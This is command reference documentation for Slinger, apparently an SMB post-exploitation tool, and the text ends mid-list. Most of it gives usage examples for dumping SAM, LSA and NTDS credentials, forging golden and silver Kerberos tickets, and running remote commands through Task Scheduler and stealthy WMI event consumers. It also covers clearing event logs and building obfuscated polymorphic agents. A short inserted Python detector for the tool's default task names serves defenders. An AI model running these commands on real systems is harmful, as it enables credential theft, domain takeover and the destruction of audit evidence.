- remote: Specify the remote host and port to forward to
  - Required: Yes
ifconfig
Description: Display network interfaces on the remote server
Help:
usage: ifconfig [-h]
Display network interfaces on the remote server
Example Usage:
Example Usage: ifconfig
ipconfig
Description: Display network interfaces on the remote server
Help:
usage: ifconfig [-h]
Display network interfaces on the remote server
Example Usage:
Example Usage: ifconfig
enuminterfaces
Description: Display network interfaces on the remote server
Help:
usage: ifconfig [-h]
Display network interfaces on the remote server
Example Usage:
Example Usage: ifconfig
hostname
Description: Display the hostname of the remote server
Help:
usage: hostname [-h]
Display the hostname of the remote server
Example Usage:
Example Usage: hostname
procs
Description: List running processes on the remote server
Help:
usage: procs [-h] [-v] [-t]
List running processes on the remote server
Example Usage:
Example Usage: procs -t -v
ps
Description: List running processes on the remote server
Help:
usage: procs [-h] [-v] [-t]
List running processes on the remote server
Example Usage:
Example Usage: procs -t -v
tasklist
Description: List running processes on the remote server
Help:
usage: procs [-h] [-v] [-t]
List running processes on the remote server
Example Usage:
Example Usage: procs -t -v
fwrules
Description: Display firewall rules on the remote server
Help:
usage: fwrules [-h]
Display firewall rules on the remote server
Example Usage:
Example Usage: fwrules
set
Description: Set a variable for use in the application
Help:
usage: set [-h] varname [value]
Set a variable for use in the application
Example Usage:
Example Usage: set varname value
Arguments
- varname: Set the debug variable to True or False
  - Required: Yes
- value: Set the mode variable to True or False
  - Default: ``
  - Required: No
config
Description: Show the current config
Help:
usage: config [-h]
Show the current config
Example Usage:
Example Usage: config
run
Description: Run a slinger script or command sequence
Help:
usage: run [-h] (-c CMD_CHAIN | -f FILE)
Run a slinger script or command sequence
Example Usage:
Example Usage: run -c "use C$;cd Users;cd Administrator;cd Downloads;ls"
Arguments
- cmd_chain: Specify a command sequence to run
  - Required: No
- file: Specify a script file to run
  - Required: No
secretsdump
Description: Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Help:
usage: secretsdump [-h] [--sam] [--lsa] [--ntds] [--just-dc-ntlm] [--history]
[-o OUTPUT] [--tmp-path PATH]
Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Example Usage:
Examples:
secretsdump # Dump SAM + LSA (default)
secretsdump --sam # SAM hashes only
secretsdump --lsa # LSA secrets only (cached creds, service passwords)
secretsdump --ntds # NTDS.dit via DRS replication (DC only)
secretsdump --ntds --just-dc-ntlm # NTDS NTLM hashes only (faster)
secretsdump --history # Include password history
secretsdump -o /tmp/hashes.txt # Save output to file
hashdump # Alias for secretsdump --sam
Arguments
- output: Save extracted secrets to file
  - Required: No
- tmp_path: Absolute disk path for temporary hive files (default: auto per share). Must be writable by SYSTEM and accessible from the connected share
  - Required: No
hashdump
Description: Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Help:
usage: secretsdump [-h] [--sam] [--lsa] [--ntds] [--just-dc-ntlm] [--history]
[-o OUTPUT] [--tmp-path PATH]
Extract credentials using the existing SMB session. Supports SAM hashes, LSA secrets (cached domain creds, service passwords), and NTDS.dit (domain controllers only via DRS replication).
Example Usage:
Examples:
secretsdump # Dump SAM + LSA (default)
secretsdump --sam # SAM hashes only
secretsdump --lsa # LSA secrets only (cached creds, service passwords)
secretsdump --ntds # NTDS.dit via DRS replication (DC only)
secretsdump --ntds --just-dc-ntlm # NTDS NTLM hashes only (faster)
secretsdump --history # Include password history
secretsdump -o /tmp/hashes.txt # Save output to file
hashdump # Alias for secretsdump --sam
Arguments
- output: Save extracted secrets to file
  - Required: No
- tmp_path: Absolute disk path for temporary hive files (default: auto per share). Must be writable by SYSTEM and accessible from the connected share
  - Required: No
spnenum
Description: Query SPNs from the domain for Kerberoasting / silver ticket targets
Help:
usage: spnenum [-h] --method {atexec,wmiexec} [--query QUERY] [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
Query SPNs from the domain for Kerberoasting / silver ticket targets
Example Usage:
Examples:
spnenum --method atexec # List all SPNs via Task Scheduler
spnenum --method atexec --query "*/FOREST" # SPNs matching pattern
spnenum --method wmiexec # List all SPNs via WMI DCOM
spnenum --method atexec --query "MSSQLSvc/*" # Find SQL Server SPNs
Methods:
atexec - Runs 'setspn -Q' as SYSTEM via Task Scheduler. Requires share connection.
wmiexec - Runs 'setspn -Q' as SYSTEM via WMI DCOM. Requires DCOM ports.
Note: Both methods save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
- method: Enumeration method: atexec (Task Scheduler) or wmiexec (WMI DCOM)
  - Choices: atexec, wmiexec
  - Required: Yes
- query: SPN query pattern (default: */* for all SPNs)
  - Default: */*
  - Required: No
- sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
  - Default: \Users\Public\Downloads\
  - Required: No
- sn: Filename for command output (default: random)
  - Required: No
- tn: Scheduled task name (default: auto-generated)
  - Required: No
- ta: Task author for OPSEC (default: Slinger)
  - Default: Slinger
  - Required: No
- td: Task description for OPSEC (default: Slinger Task)
  - Default: Slinger Task
  - Required: No
- tf: Task Scheduler folder (default: \Windows)
  - Default: \Windows
  - Required: No
- wait: Seconds to wait for task completion (default: 2)
  - Default: 2
  - Required: No
ticket
Description: Forge Kerberos tickets using extracted hashes. Golden tickets use the krbtgt hash (full domain access). Silver tickets use a service account hash (access to specific service).
Help:
usage: ticket [-h] {golden,silver} ...
Forge Kerberos tickets using extracted hashes. Golden tickets use the krbtgt hash (full domain access). Silver tickets use a service account hash (access to specific service).
Example Usage:
Examples:
ticket golden --nthash <krbtgt_hash> # Golden ticket as Administrator
ticket golden --nthash <hash> --user svc_admin --user-id 1001
ticket golden --aesKey <aes256_key> --domain htb.local
ticket silver --nthash <machine_hash> --spn cifs/dc01.htb.local
ticket silver --nthash <hash> --spn http/web01.htb.local --user admin
Note: Domain SID auto-fetched via SAMR if not provided.
Requires krbtgt hash (golden) or service account hash (silver) from secretsdump --ntds.
Subcommands
ticket golden
Description: Forge a TGT using the krbtgt NTLM hash or AES key. Grants full domain access as any user.
Help:
usage: ticket golden [-h] [--nthash NTHASH] [--aesKey AESKEY]
[--domain DOMAIN] [--domain-sid DOMAIN_SID] [--user USER]
[--user-id USER_ID] [--groups GROUPS]
[--extra-sid EXTRA_SID] [--duration DURATION] [-o OUTPUT]
Forge a TGT using the krbtgt NTLM hash or AES key. Grants full domain access as any user.
Example Usage:
Examples:
ticket golden --nthash <krbtgt_hash>
ticket golden --nthash <hash> --user svc_admin --user-id 1001
ticket golden --aesKey <aes256> --groups "513, 512, 520, 518, 519"
ticket golden --nthash <hash> --extra-sid S-1-5-21-...-519 -o admin.ccache
Arguments
- nthash: krbtgt NTLM hash for ticket signing
- aesKey: krbtgt AES key (128 or 256 bit) for ticket signing
- domain: Domain FQDN (default: session domain)
- domain_sid: Domain SID (auto-fetched if not provided)
- user: User to impersonate (default: Administrator)
  - Default: Administrator
- user_id: User RID (default: 500)
  - Default: 500
- groups: Group RIDs (default: Domain Users, Domain Admins, etc.)
  - Default: 513, 512, 520, 518, 519
- extra_sid: Extra SID to add to ticket (for cross-domain)
- duration: Ticket duration in hours (default: 87600 = 10 years)
  - Default: 87600
- output: Output ccache file path (default: ~/.slinger/.ccache)
  - Required: No
ticket silver
Description: Forge a TGS for a specific service using the service account's NTLM hash or AES key.
Help:
usage: ticket silver [-h] [--nthash NTHASH] [--aesKey AESKEY] --spn SPN
[--domain DOMAIN] [--domain-sid DOMAIN_SID] [--user USER]
[--user-id USER_ID] [-o OUTPUT]
Forge a TGS for a specific service using the service account's NTLM hash or AES key.
Example Usage:
Examples:
ticket silver --nthash <machine_hash> --spn cifs/dc01.htb.local
ticket silver --nthash <hash> --spn http/web01.htb.local --user admin
ticket silver --aesKey <aes256> --spn ldap/dc01.htb.local
Arguments
- nthash: Service account NTLM hash for ticket signing
- aesKey: Service account AES key (128 or 256 bit)
- spn: Target SPN (e.g., cifs/dc01.domain.com)
- domain: Domain FQDN (default: session domain)
- domain_sid: Domain SID (auto-fetched if not provided)
- user: User to impersonate (default: Administrator)
  - Default: Administrator
- user_id: User RID (default: 500)
  - Default: 500
- output: Output ccache file path (default: ~/.slinger/.ccache)
  - Required: No
env
Description: Display environment variables on the remote server
Help:
usage: env [-h]
Display environment variables on the remote server
Example Usage:
Example Usage: env
debug-availcounters
Description: Display available performance counters on the remote server. This is for debug use only, it doesn't really give you anything.
Help:
usage: debug-availcounters [-h] [-f FILTER] [-p] [-s filename]
Display available performance counters on the remote server. This is for debug use only, it doesn't really give you anything.
Example Usage:
Example Usage: availcounters
Arguments
- filter: Simple filter for case-insensitive counters containing a given string
  - Required: No
- save: Save the available counters to a file
  - Required: No
debug-counter
Description: Display a performance counter on the remote server. This is for debug use only, it doesn't really give you anything.
Help:
usage: debug-counter [-h] [-c COUNTER] [-a {x86,x64,unk}] [-i]
Display a performance counter on the remote server. This is for debug use only, it doesn't really give you anything.
Example Usage:
Example Usage: counter -c 123 [-a x86]
Arguments
- counter: Specify the counter to display
  - Required: No
- arch: Specify the architecture of the remote server
  - Choices: x86, x64, unk
  - Default: unk
  - Required: No
network
Description: Display network information on the remote server
Help:
usage: network [-h] [--tcp] [--rdp]
Display network information on the remote server
Example Usage:
Example Usage: network
atexec
Description: Execute a command on the remote server
Help:
usage: atexec [-h] -c COMMAND [--sp SP] [--sn SN] [--tn TN] [--ta TA]
[--td TD] [--tf TF] [--no-output] [-i] [-w WAIT]
Execute a command on the remote server
Example Usage:
Example Usage: atexec -tn "NetSvc" -sp \\Users\\Public\\Downloads\\ -c ipconfig
For multi-word commands: atexec -c "echo hello world" -tn MyTask
Note: Output is saved to a temp file on target and retrieved via SMB.
--sp should be reachable from the connected share (auto-adjusted per share type).
Arguments
- command: Specify the command to execute. For commands with spaces, wrap in quotes (e.g., 'echo hello world')
  - Required: Yes
- sp: Folder to save output file (default: auto per share, e.g., \Temp\ on ADMIN$)
  - Default: \Users\Public\Downloads\
  - Required: No
- sn: Specify the name of the output file. Default is <random 8-10 chars>.txt
  - Required: No
- tn: Specify the name of the scheduled task (default: auto-generated)
  - Required: No
- ta: Specify the author of the scheduled task
  - Default: Slinger
  - Required: No
- td: Specify the description of the scheduled task
  - Default: Scheduled task created by Slinger
  - Required: No
- tf: Specify the folder to run the task in
  - Default: \Windows
  - Required: No
- wait: Seconds to wait for the task to complete
  - Default: 1
  - Required: No
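For defenders: the atexec, spnenum and eventlog argument lists on this page give the default task author (Slinger) and descriptions (Scheduled task created by Slinger, Slinger Task). The following added example, which is not part of Slinger, audits Task Scheduler XML such as the TaskContent field of Security event 4698 for those defaults. The event dicts and task names are constructed, and because the values can be changed with --ta/--td, an empty result rules nothing out.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler task definitions (exported tasks and the
# TaskContent field of Security event 4698, "A scheduled task was created").
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Defaults documented on this page, lower-cased for comparison.
DEFAULT_AUTHOR = "slinger"
DEFAULT_DESCRIPTIONS = {"slinger task", "scheduled task created by slinger"}


def _text(root, path):
    """Return the stripped, lower-cased text of a node, or '' if absent."""
    node = root.find(path, NS)
    return (node.text or "").strip().lower() if node is not None else ""


def audit_task_xml(task_xml):
    """Return the list of RegistrationInfo fields that match the defaults.

    Malformed XML is reported as ['unparseable'] rather than skipped, since a
    task definition that cannot be parsed deserves a manual look.
    """
    # Drop any XML declaration so a declared encoding cannot clash with str input.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml)
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable"]
    findings = []
    if _text(root, "t:RegistrationInfo/t:Author") == DEFAULT_AUTHOR:
        findings.append("author")
    if _text(root, "t:RegistrationInfo/t:Description") in DEFAULT_DESCRIPTIONS:
        findings.append("description")
    return findings


def triage(events):
    """Return (task name, findings) for every event that needs review."""
    hits = []
    for ev in events:
        findings = audit_task_xml(ev.get("TaskContent", ""))
        if findings:
            hits.append((ev.get("TaskName", "?"), findings))
    return hits


def _task(author, description):
    """Build a minimal task definition for the constructed samples below."""
    return (
        '<Task version="1.2" '
        'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<RegistrationInfo><Author>{author}</Author>"
        f"<Description>{description}</Description></RegistrationInfo>"
        "<Actions><Exec><Command>cmd.exe</Command></Exec></Actions></Task>"
    )


# Constructed sample events (assumed shape: one dict per 4698 record).
SAMPLE_EVENTS = [
    {"TaskName": "\\ExampleTaskA",
     "TaskContent": _task("Slinger", "Scheduled task created by Slinger")},
    {"TaskName": "\\ExampleTaskB",
     "TaskContent": _task("CONTOSO\\backup", "Nightly backup job")},
    {"TaskName": "\\ExampleTaskC",
     "TaskContent": _task("CONTOSO\\ops", "Slinger Task")},
    {"TaskName": "\\ExampleTaskD", "TaskContent": "<Task><RegistrationInfo>"},
]

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_EVENTS):
        print(name, findings)
```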
reload
Description: Reload the current sessions context
Help:
usage: reload [-h]
Reload the current sessions context
Example Usage:
Example Usage: reload
plugins
Description: List available plugins
Help:
usage: plugins [-h]
List available plugins
Example Usage:
Example Usage: plugins
changes
Description: Display audit trail of all write operations this session
Help:
usage: changes [-h] [--category {FILE,SERVICE,TASK,REGISTRY,AGENT,EXEC}]
[--save] [--clear]
Display audit trail of all write operations this session
Example Usage:
Example Usage: changes | changes --category FILE | changes --save
Arguments
- category: Filter by change category
  - Choices: FILE, SERVICE, TASK, REGISTRY, AGENT, EXEC
  - Required: No
downloads
Description: Manage resume download states and cleanup
Help:
usage: downloads [-h] {list,cleanup} ...
Manage resume download states and cleanup
Example Usage:
Example Usage: downloads list
Subcommands
downloads list
Description: Display all active resumable downloads with progress
Help:
usage: downloads list [-h]
Display all active resumable downloads with progress
downloads cleanup
Description: Remove completed, stale, or corrupted download state files
Help:
usage: downloads cleanup [-h] [--max-age MAX_AGE] [--force]
Remove completed, stale, or corrupted download state files
Arguments
- max_age: Remove state files older than N days
  - Default: 7
  - Required: No
eventlog
Description: Query Windows Event Logs via RPC over SMB named pipe \pipe\eventlog
Help:
usage: eventlog [-h] {query,list,check,clear,status} ...
Query Windows Event Logs via RPC over SMB named pipe \pipe\eventlog
Example Usage:
Examples:
eventlog status # Check if eventlog pipe exists
eventlog list --method rpc # List available event logs
eventlog check --method rpc --log System # Check if a log exists
eventlog query --method rpc --log System --last 30 --limit 10 # Query via RPC
eventlog query --method atexec --log System --limit 10 # Query via Task Scheduler
eventlog query --method rpc --log System --format json -o events.json # Export to JSON
eventlog clear --method atexec --log Application --force # Clear via Task Scheduler
eventlog clear --method wmiexec --log System --force # Clear via WMI DCOM
Subcommands
eventlog query
Description: Query Windows Event Log entries with filtering and export
Help:
usage: eventlog query [-h] --method {rpc,atexec,wmiexec} --log LOG [--id ID]
[--type {error,warning,information,success,failure}]
[--since SINCE] [--last MINUTES] [--limit LIMIT]
[--source SOURCE] [--find FIND]
[--format {table,json,list,csv}] [-o OUTPUT] [--verbose]
[--order {newest,oldest}] [--sp PATH] [--sn NAME]
[--tn NAME] [--ta AUTHOR] [--td DESC] [--tf FOLDER]
[-w SECS]
Query Windows Event Log entries with filtering and export
Example Usage:
Examples:
eventlog query --method rpc --log System --last 30 --limit 10
eventlog query --method rpc --log Application --level error --limit 20
eventlog query --method rpc --log Security --find 'failed logon' --limit 20
eventlog query --method rpc --log System --format json -o events.json
eventlog query --method rpc --log System --format csv -o events.csv
eventlog query --method atexec --log Security --limit 50
eventlog query --method wmiexec --log System --limit 10
Methods:
rpc - Query via \pipe\eventlog RPC (default, fastest)
atexec - Query via 'wevtutil qe' as SYSTEM through Task Scheduler
wmiexec - Query via 'wevtutil qe' as SYSTEM through WMI DCOM
Arguments
- method: Query method: rpc (\pipe\eventlog), atexec (Task Scheduler), or wmiexec (WMI DCOM)
  - Choices: rpc, atexec, wmiexec
- log: Event log name (System, Application, Security, etc.)
- id: Specific event ID to filter
- level: Event level to filter
  - Choices: error, warning, information, success, failure
- since: Events since date (YYYY-MM-DD or 'YYYY-MM-DD HH:MM:SS')
- last: Events from the last X minutes
- limit: Maximum number of events to return
  - Default: 10
- source: Filter by event source name
- find: Search for string in event content
- format: Output format (default: list)
  - Choices: table, json, list, csv
  - Default: list
- output: Save output to file
- order: Order events by newest first (default) or oldest first
  - Choices: newest, oldest
  - Default: newest
- sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
  - Default: \Users\Public\Downloads\
- sn: Filename for command output (default: random)
- tn: Scheduled task name (default: auto-generated)
- ta: Task author for OPSEC (default: Slinger)
  - Default: Slinger
- td: Task description for OPSEC (default: Slinger Task)
  - Default: Slinger Task
- tf: Task Scheduler folder (default: \Windows)
  - Default: \Windows
- wait: Seconds to wait for task completion (default: 2)
  - Default: 2
  - Required: No
eventlog list
Description: List all available event logs on the remote system
Help:
usage: eventlog list [-h] --method {rpc,atexec,wmiexec} [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
List all available event logs on the remote system
Example Usage:
Examples:
eventlog list --method rpc # List via RPC pipe
eventlog list --method atexec # List via Task Scheduler (wevtutil)
eventlog list --method wmiexec # List via WMI DCOM (wevtutil)
Arguments
- method: Method: rpc (\pipe\eventlog), atexec (Task Scheduler), or wmiexec (WMI DCOM)
  - Choices: rpc, atexec, wmiexec
- sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
  - Default: \Users\Public\Downloads\
- sn: Filename for command output (default: random)
- tn: Scheduled task name (default: auto-generated)
- ta: Task author for OPSEC (default: Slinger)
  - Default: Slinger
- td: Task description for OPSEC (default: Slinger Task)
  - Default: Slinger Task
- tf: Task Scheduler folder (default: \Windows)
  - Default: \Windows
- wait: Seconds to wait for task completion (default: 2)
  - Default: 2
  - Required: No
eventlog check
Description: Check if a specific Windows Event Log exists and is accessible
Help:
usage: eventlog check [-h] --method {rpc,atexec,wmiexec} --log LOG [--sp PATH]
[--sn NAME] [--tn NAME] [--ta AUTHOR] [--td DESC]
[--tf FOLDER] [-w SECS]
Check if a specific Windows Event Log exists and is accessible
Example Usage:
Examples:
eventlog check --method rpc --log System # Check via RPC pipe
eventlog check --method atexec --log Security # Check via Task Scheduler (wevtutil)
eventlog check --method wmiexec --log Application # Check via WMI DCOM (wevtutil)
Arguments
- method: Method: rpc (\pipe\eventlog), atexec (Task Scheduler), or wmiexec (WMI DCOM)
  - Choices: rpc, atexec, wmiexec
- log: Event log name to check (can include custom paths)
- sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
  - Default: \Users\Public\Downloads\
- sn: Filename for command output (default: random)
- tn: Scheduled task name (default: auto-generated)
- ta: Task author for OPSEC (default: Slinger)
  - Default: Slinger
- td: Task description for OPSEC (default: Slinger Task)
  - Default: Slinger Task
- tf: Task Scheduler folder (default: \Windows)
  - Default: \Windows
- wait: Seconds to wait for task completion (default: 2)
  - Default: 2
  - Required: No
eventlog clear
Description: Clear all events from a Windows Event Log (cannot be undone)
Help:
usage: eventlog clear [-h] --log LOG --method {rpc,atexec,wmiexec} [--force]
[--sp PATH] [--sn NAME] [--tn NAME] [--ta AUTHOR]
[--td DESC] [--tf FOLDER] [-w SECS]
Clear all events from a Windows Event Log (cannot be undone)
Example Usage:
Examples:
eventlog clear --log System --method atexec --force # wevtutil as SYSTEM via Task Scheduler
eventlog clear --log Application --method wmiexec --force # wevtutil as SYSTEM via WMI DCOM
eventlog clear --log Security --method rpc --force # RPC via \pipe\eventlog (needs elevated privs)
Methods:
rpc - Direct RPC via \pipe\eventlog. Requires SE_SECURITY_PRIVILEGE (fails with UAC filtering)
atexec - Runs 'wevtutil cl' as SYSTEM via Task Scheduler. Requires share connection. Leaves Event ID 1102
wmiexec - Runs 'wevtutil cl' as SYSTEM via WMI DCOM. Requires DCOM ports (135+dynamic). Leaves Event ID 1102
Note: atexec/wmiexec save output to a temp file on target and retrieve it via SMB.
--sp should be reachable from the connected share.
Arguments
- log: Event log name to clear
- method: Clearing method: rpc, atexec (Task Scheduler), or wmiexec (WMI DCOM)
  - Choices: rpc, atexec, wmiexec
- sp: Directory on target to save command output (default: auto per share). Should be reachable from the connected share
  - Default: \Users\Public\Downloads\
- sn: Filename for command output (default: random)
- tn: Scheduled task name (default: auto-generated)
- ta: Task author for OPSEC (default: Slinger)
  - Default: Slinger
- td: Task description for OPSEC (default: Slinger Task)
  - Default: Slinger Task
- tf: Task Scheduler folder (default: \Windows)
  - Default: \Windows
- wait: Seconds to wait for task completion (default: 2)
  - Default: 2
  - Required: No
eventlog status
Description: Check IPC$ pipes for eventlog service availability
Help:
usage: eventlog status [-h]
Check IPC$ pipes for eventlog service availability
Example Usage:
Examples:
eventlog status # Check if \pipe\eventlog exists in IPC$
wmiexec
Description: Execute commands on the remote system using various WMI execution methods. Each method has different capabilities, stealth levels, and requirements.
Help:
usage: wmiexec [-h] [--endpoint-info] METHOD ...
Execute commands on the remote system using various WMI execution methods. Each method has different capabilities, stealth levels, and requirements.
Example Usage:
Available Methods:
dcom - Traditional Win32_Process.Create via DCOM
event - WMI Event Consumer (stealthy)
query - Execute WQL queries
Example Usage:
wmiexec dcom 'systeminfo' # Traditional DCOM
wmiexec event 'net user' --trigger-delay 5 # Event consumer
wmiexec query 'SELECT * FROM Win32_Process' # WQL query
Subcommands
wmiexec dcom
Description: Execute commands using traditional WMI Win32_Process.Create method via DCOM. Requires DCOM connectivity (ports 135 + dynamic range). May be blocked by firewalls.
Help:
usage: wmiexec dcom [-h] [-c COMMAND] [-i] [--timeout TIMEOUT]
[--output filename] [--no-output]
[--sleep-time SLEEP_TIME] [--sp PATH] [--sn NAME]
[--raw-command] [--shell {cmd,powershell}]
Execute commands using traditional WMI Win32_Process.Create method via DCOM. Requires DCOM connectivity (ports 135 + dynamic range). May be blocked by firewalls.
Example Usage:
Command Wrappers:
DEFAULT: cmd.exe /Q /c "command" # Standard Windows command execution
--raw-command: command # No wrapper, execute directly
--shell powershell: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -NonInteractive -NoLogo -Command "command"
Raw Command Usage:
Use --raw-command when you want to execute commands WITHOUT the cmd.exe wrapper:
Standard (with cmd.exe wrapper):
wmiexec dcom -c "whoami" # Executes: cmd.exe /Q /c whoami
wmiexec dcom -c "dir C:\" # Executes: cmd.exe /Q /c dir C:
Raw (no wrapper):
wmiexec dcom -c "whoami" --raw-command # Executes: whoami (directly)
wmiexec dcom -c "calc.exe" --raw-command # Executes: calc.exe (directly)
Output control:
wmiexec dcom -c "whoami" --no-output # Execute without capturing output
wmiexec dcom -c "whoami" --sp "C:\Users\Public" # Custom save path for output file
wmiexec dcom -c "whoami" --sn myoutput.txt # Custom output filename
Interactive Mode:
wmiexec dcom -i # Start interactive DCOM shell
wmiexec dcom -i --output session.txt # Save session log to local file
wmiexec dcom -i --sp "C:\Users\Public" --sn out.txt # Custom remote output path/name per command
wmiexec dcom -i --shell powershell # Interactive PowerShell shell
Note: WMI working directory syncs with SMB 'cd'. Use 'cd' to change directory before running commands.
Output is saved to a temp file on target and retrieved via SMB.
--sp must be a path reachable from the connected share (e.g., \Temp\ on ADMIN$).
Arguments
- command: Command to execute (not required for --interactive mode)
- timeout: Command execution timeout in seconds
  - Default: 30
- output: Save command output to local file
- sleep_time: Sleep time before capturing output in seconds
  - Default: 1.0
- save_path: Directory on target to save output file (default: auto per share). Should be reachable from the connected share
- save_name: Custom filename for remote output capture (default: auto-generated)
- shell: Shell to use for command execution
  - Choices: cmd, powershell
  - Default: cmd
  - Required: No
wmiexec event
Description: Execute commands using WMI Event Consumers (highest stealth method).
Examples:
# Basic usage
wmiexec event "whoami"
# Raw command mode (direct CommandLineTemplate)
wmiexec event "calc.exe" --raw-command # ExecutablePath: cmd.exe
wmiexec event "whoami" --raw-exec "" # ExecutablePath: None (blank)
wmiexec event "Get-Process" --raw-exec "powershell.exe" # ExecutablePath: powershell.exe
# Custom artifacts for stealth
wmiexec event "whoami" --exe pwsh --cname "UpdateConsumer" --fname "MaintenanceFilter" \
--script-name "check_system" --upload-path "C:\Windows\System32\check_system.ps1" \
-o "C:\Windows\Logs\system_check.log" --trigger-exe "svchost.exe"
# With local save
wmiexec event "systeminfo" -o "C:\temp\info.txt" --save "./sysinfo.txt"
Help:
usage: wmiexec event [-h] [--consumer-name CONSUMER_NAME]
[--filter-name FILTER_NAME]
[--trigger-delay TRIGGER_DELAY] [--no-cleanup]
[--timeout TIMEOUT] [--no-output] [--save filename]
[--working-dir WORKING_DIR] [--shell {cmd,powershell}]
[--exe {cmd,pwsh}] [--trigger-exe TRIGGER_EXE]
[-t TRIGGER] [-l] [-i] [--system]
[--upload-path UPLOAD_PATH] [--script-name SCRIPT_NAME]
[-o OUTPUT] [--raw-command] [--raw-exec RAW_EXEC]
[command]
Execute commands using WMI Event Consumers (highest stealth method).
Examples:
# Basic usage
wmiexec event "whoami"
# Raw command mode (direct CommandLineTemplate)
wmiexec event "calc.exe" --raw-command # ExecutablePath: cmd.exe
wmiexec event "whoami" --raw-exec "" # ExecutablePath: None (blank)
wmiexec event "Get-Process" --raw-exec "powershell.exe" # ExecutablePath: powershell.exe
# Custom artifacts for stealth
wmiexec event "whoami" --exe pwsh --cname "UpdateConsumer" --fname "MaintenanceFilter" \
--script-name "check_system" --upload-path "C:\Windows\System32\check_system.ps1" \
-o "C:\Windows\Logs\system_check.log" --trigger-exe "svchost.exe"
# With local save
wmiexec event "systeminfo" -o "C:\temp\info.txt" --save "./sysinfo.txt"
Arguments
command: Command to execute (not required for --interactive mode)
consumer_name: Name for CommandLineEventConsumer (default: auto-generated)
filter_name: Name for __EventFilter (default: auto-generated)
trigger_delay: Seconds to wait before triggering event
- Default: 5
timeout: Total execution timeout in seconds
- Default: 30
save: Save command output to local file
working_dir: Working directory for command execution
- Default: C:\
shell: Shell to use for command execution
- Choices: cmd, powershell
- Default: cmd
exe: Execution type: 'cmd' (uploads .bat file) or 'pwsh' (uploads .ps1 file)
- Choices: cmd, pwsh
- Default: cmd
trigger_exe: Executable to trigger the Event Filter (default: notepad.exe). Will be automatically spawned after consumer creation.
- Default: notepad.exe
trigger: Only trigger an existing Event Consumer (no creation). Specify executable to spawn.
upload_path: Custom script upload path on target (default: C:\Windows\Temp\RANDOM_NAME.ext where ext is .bat for cmd or .ps1 for pwsh)
script_name: Custom script filename (without extension, will be auto-appended based on --exe type). If not specified, completely random name is generated.
output: Custom remote output file path for capturing command results (default: C:\Windows\Temp\out_RANDOM.tmp). Supports CMS notation.
raw_exec: Put the entire command directly into CommandLineTemplate. ExecutablePath is set to the provided string value.
- Required: No
wmiexec query
Description: Execute WMI Query Language (WQL) queries against the remote system. Supports interactive mode, class description, and multiple output formats.
Help:
usage: wmiexec query [-h] [--namespace NAMESPACE]
[--format {list,table,json,csv}] [-o FILE]
[--timeout SECONDS]
[--interactive | --describe CLASS | --list-classes |
--template TEMPLATE | --list-templates | query]
Execute WMI Query Language (WQL) queries against the remote system. Supports interactive mode, class description, and multiple output formats.
Example Usage:
Query Examples:
wmiexec query "SELECT * FROM Win32_Process"
wmiexec query "SELECT Name, ProcessId FROM Win32_Process WHERE Name = 'notepad.exe'"
wmiexec query "SELECT * FROM Win32_Service WHERE State = 'Running'"
wmiexec query --describe Win32_Process
wmiexec query --interactive
wmiexec query --template processes --timeout 300
wmiexec query "SELECT * FROM Win32_UserAccount" --format json -o users.json
wmiexec query --template processes --format table
Arguments
query: WQL query string to execute (e.g., 'SELECT * FROM Win32_Process')
describe: Describe WMI class schema (e.g., --describe Win32_Process)
template: Execute predefined query template (use --list-templates to see available)
namespace: WMI namespace to query (default: root/cimv2)
- Default: root/cimv2
format: Output format for query results (default: list)
- Choices: list, table, json, csv
- Default: list
output: Save query results to file
timeout: Query timeout in seconds (default: 120)
- Default: 120
- Required: No
agent
Description: Build polymorphic C++ agents for named pipe command execution
Help:
usage: agent [-h]
{build,info,deploy,list,rename,check,use,start,kill,rm,reset,update} ...
Build polymorphic C++ agents for named pipe command execution
Example Usage:
Example Usage: agent build --arch x64 | agent deploy ./agent.exe --path temp\\ --name myagent --start
Subcommands
agent build
Description: Build C++ agents with advanced obfuscation and polymorphic encryption
Help:
usage: agent build [-h] [--arch {x86,x64,both}] [--encryption]
[--no-encryption] [--debug] [--output-dir OUTPUT_DIR]
[--dry-run] [--pipe PIPE] [--name NAME] [--pass PASSPHRASE]
[--obfuscate] [--upx PATH]
Build C++ agents with advanced obfuscation and polymorphic encryption
Example Usage:
Examples:
agent build # Build both x86 and x64 agents with defaults
agent build --arch x64 # Build only x64 agent
agent build --pipe myagent # Use custom pipe name "myagent"
agent build --name slinger # Output as slinger_x64.exe/slinger_x86.exe
agent build --pass MySecretPass123 # Enable HMAC-SHA256 authentication
agent build --obfuscate # Strip symbols and anti-debug
agent build --obfuscate --upx upx # Obfuscate and pack with UPX
agent build --arch x64 --pipe agent1 --pass P@ss --obfuscate # Full production build
agent build --dry-run # Check build prerequisites without building
agent build --debug # Enable debug logging in agent binary
Arguments
arch: Target architecture for agent build
- Choices: x86, x64, both
- Default: both
output_dir: Custom output directory for built agents
pipe: Specify custom pipe name for the agent (default: slinger)
- Default: slinger
name: Specify custom name for the output binary file
passphrase: Passphrase for agent authentication (HMAC-SHA256 with PBKDF2)
upx: Pack Windows PE binary with UPX after building (e.g., --upx /usr/bin/upx or --upx upx for system PATH)
- Required: No
agent info
Description: Display configuration and capabilities of the agent builder
Help:
usage: agent info [-h]
Display configuration and capabilities of the agent builder
agent deploy
